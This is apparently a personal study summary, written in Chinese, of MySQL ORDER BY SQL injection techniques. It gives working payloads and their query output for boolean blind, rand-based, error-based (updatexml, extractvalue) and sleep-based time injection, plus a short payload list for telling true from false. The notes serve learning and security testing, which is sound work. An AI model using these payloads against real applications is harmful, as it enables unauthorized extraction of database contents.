小结--order by 注入

之前已经学过的东西，准备把他们依次总结下，包括之前看的一些文章，一些小的tricks之类的，就先从注入开始吧

0x01 盲注

1. 判断1和0

a. if

select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2));
+-------+-----------+---------+
| user  | password  | user_id |
+-------+-----------+---------+
| admin | admintest |       1 |
+-------+-----------+---------+
1 row in set (0.00 sec)

b.rand

mysql> select rand(true);
+---------------------+
| rand(true)          |
+---------------------+
| 0.40540353712197724 |
+---------------------+
1 row in set (0.00 sec)

mysql> select rand(false);
+---------------------+
| rand(false)         |
+---------------------+
| 0.15522042769493574 |
+---------------------+
1 row in set (0.00 sec)

这里可以利用rand(true) rand(false)的值不同，排序注入后面的顺序也不同

mysql> select * from user order by 1-rand(substr(version(),1,1)=5);
+-------+-----------+---------+
| user  | password  | user_id |
+-------+-----------+---------+
| test  | testadmin |       2 |
| admin | admintest |       1 |
| sp4rk | sp4rktest |       3 |
+-------+-----------+---------+
3 rows in set (0.02 sec)

c.regexp
select * from user order by 1-if(1=(select 1 regexp if(1=1,1,0x00)),1,1);

0x02 报错注入

select * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0);
ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
mysql> select * from user order by 1-extractvalue(1,concat(0x5e24,version(),0x5e24));
ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'

0x03 延时注入

select * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0);

0x04 asc desc处

1.盲注

mysql> select user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc;
+-------+
| user  |
+-------+
| admin |
| sp4rk |
| test  |
+-------+

报错，延时同上

0x05 逻辑区别进行排序

mysql> select user from user order by 1-if(1=1,user,user_id);
+-------+
| user  |
+-------+
| admin |
| test  |
| sp4rk |
+-------+
3 rows in set, 3 warnings (0.00 sec)

mysql> select user from user order by 1-if(1=1,user_id,user);
+-------+
| user  |
+-------+
| sp4rk |
| test  |
| admin |
+-------+

payload:    ,if(1=1,user_id,user);
,(case when (1=1) then user_id else user end)
,ifnull(null,user_id)
,rand(1=1)

0x06利用报错判断

payload:
if(1=1,1,(select 1 union select 2))  正确
if(1=2,1,(select 1 union select 2)) 错误
if(1=1,1,(select 1 from information_schema.tables)) 正确
if(1=2,1,(select 1 from information_schema.tables)) 错误